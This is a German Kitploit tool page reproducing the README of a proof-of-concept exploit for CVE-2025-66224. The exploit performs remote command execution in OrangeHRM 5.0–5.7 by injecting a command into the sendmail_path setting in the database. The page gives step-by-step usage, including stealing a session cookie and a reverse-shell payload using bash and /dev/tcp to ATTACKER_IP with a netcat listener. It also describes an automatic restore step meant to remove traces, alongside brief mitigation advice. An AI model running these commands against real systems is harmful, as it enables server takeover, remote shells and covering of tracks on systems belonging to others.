Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-CVE-2025-66224 — Proof-of-Concept-Exploit für CVE-2025-66224 zur Demonstration von Remotecodeausführung in OrangeHRM über eine Befehleinschleusung im Parameter sendmail_path, mit automatischer Datenbank-Payload-Injektion und Bereinigung. | Kitploit
Tools/GitHubGitHub/richard-natan/poc-cve-2025-66224
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungDatenbanksicherheit
GitHubrichard-natan/poc-cve-2025-66224

PoC-CVE-2025-66224

Proof-of-Concept-Exploit für CVE-2025-66224 zur Demonstration von Remotecodeausführung in OrangeHRM über eine Befehleinschleusung im Parameter sendmail_path, mit automatischer Datenbank-Payload-Injektion und Bereinigung.

Repository anzeigen
23vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

OrangeHRM RCE Exploit - CVE-2025-66224

📋 Beschreibung

Dieses Proof of Concept (PoC) demonstriert eine Remote Code Execution (RCE)-Schwachstelle in OrangeHRM durch Befehlseinschleusung im Konfigurationsparameter sendmail_path.

Der Exploit funktioniert wie folgt:

  1. Injizieren einer schädlichen Nutzlast in die MySQL-Datenbank (Tabelle hs_hr_config)
  2. Auslösen der Ausführung der Nutzlast über den API-Endpunkt für die E-Mail-Konfiguration
  3. Automatisches Wiederherstellen des ursprünglichen Werts, um Spuren zu beseitigen

🎯 Betroffene Versionen

  • OrangeHRM Version 5.0 bis 5.7

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests gedacht. Unautorisierter Zugriff auf Computersysteme ist illegal. Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

🔧 Anforderungen

root@kitploit:~
pip install requests mysql-connector-python

📦 Installation

root@kitploit:~
git clone https://github.com/richard-natan/PoC-CVE-2025-66224
cd PoC-CVE-2025-66224
pip install -r requirements.txt

🚀 Verwendung

Schritt 1: Sitzungs-Cookie abrufen

  1. Melden Sie sich über die Weboberfläche bei OrangeHRM an
  2. Öffnen Sie die Entwicklertools des Browsers (F12)
  3. Navigieren Sie zu Speicher > Cookies (Firefox) oder Anwendung > Cookies (Chrome)
  4. Kopieren Sie den Wert des _orangehrm-Cookies

Schritt 2: Den Exploit ausführen

root@kitploit:~
python3 exploit.py -t <ZIEL_URL> -c <COOKIE_WERT> \
    -dh <MYSQL_HOST> -du <MYSQL_BENUTZER> -dp <MYSQL_PASSWORT> \
    -cmd '<AUSZUFÜHRENDER_BEFEHL>'

Beispiel – Einfacher Befehl

root@kitploit:~
python3 exploit.py -t http://127.0.0.1:8080/ \
    -c "g58tak8pbnheseatv6dggvi31i" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd "touch /tmp/pwned"

Beispiel – Reverse Shell

root@kitploit:~
# Starten Sie einen Listener auf dem Angreifer-Rechner
nc -lvnp 4444

# Führen Sie den Exploit mit Reverse-Shell-Nutzlast aus
python3 exploit.py -t http://target.com/ \
    -c "your_session_cookie" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'

📝 Parameter

ParameterKurzformErforderlichBeschreibung
--target-t✅Ziel-URL (z. B. http://target.com)
--cookie-c✅Wert des Sitzungs-Cookies
--cookie_name-cn❌Cookie-Name (Standard: _orangehrm)
--command-cmd✅Auf dem Ziel auszuführender Befehl
--db_host-dh✅MySQL-Hostadresse
--db_user-du✅MySQL-Benutzername
--db_pass-dp✅MySQL-Passwort
--db_port-dport❌MySQL-Port (Standard: 3306)

🔍 So funktioniert es

Schwachstellendetails

Die Schwachstelle existiert in der E-Mail-Konfigurationsfunktion, bei der der Parameter sendmail_path in der Datenbank gespeichert und später ohne ordnungsgemäße Bereinigung ausgeführt wird.

Ablauf des Exploits:

root@kitploit:~
1. Authentifizierung bei OrangeHRM (gültiges Sitzungs-Cookie abrufen)
   ↓
2. Verbindung zur MySQL-Datenbank herstellen
   ↓
3. Tabelle hs_hr_config lokalisieren
   ↓
4. Wert von email_config.sendmail_path aktualisieren:
   VON: /usr/sbin/sendmail -bs
   NACH: /usr/sbin/sendmail -bs && <NUTZLAST> #
   ↓
5. Ausführung über API auslösen:
   PUT /web/index.php/api/v2/admin/email-configuration
   ↓
6. Befehl wird auf dem Server ausgeführt
   ↓
7. Ursprünglichen Wert wiederherstellen (Bereinigung)

Technische Details

Anfälliger Parameter: email_config.sendmail_path

Datenbank:

  • Tabelle: hs_hr_config
  • Spalte: name = 'email_config.sendmail_path'
  • Spalte: value = Sendmail-Befehlspfad

Auslöser-Endpunkt:

root@kitploit:~
PUT /web/index.php/api/v2/admin/email-configuration

🛡️ Gegenmaßnahmen

  1. Eingabevalidierung: Implementieren Sie strenge Validierung für den Parameter sendmail_path
  2. Escape-Mechanismen: Escapen Sie Shell-Befehle ordnungsgemäß vor der Ausführung
  3. Minimalrechte: Führen Sie den Webserver mit minimalen Berechtigungen aus
  4. Update: Wenden Sie die neuesten Sicherheitspatches für OrangeHRM an

🤝 Danksagungen

PoC von: RiccK

Team: Bypassadores && HackersOnSteroids

🔗 Referenzen

  • CVE-2025-66224

⚠️ Verantwortungsvoll nutzen. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Tests durchführen.

Tool herunterladen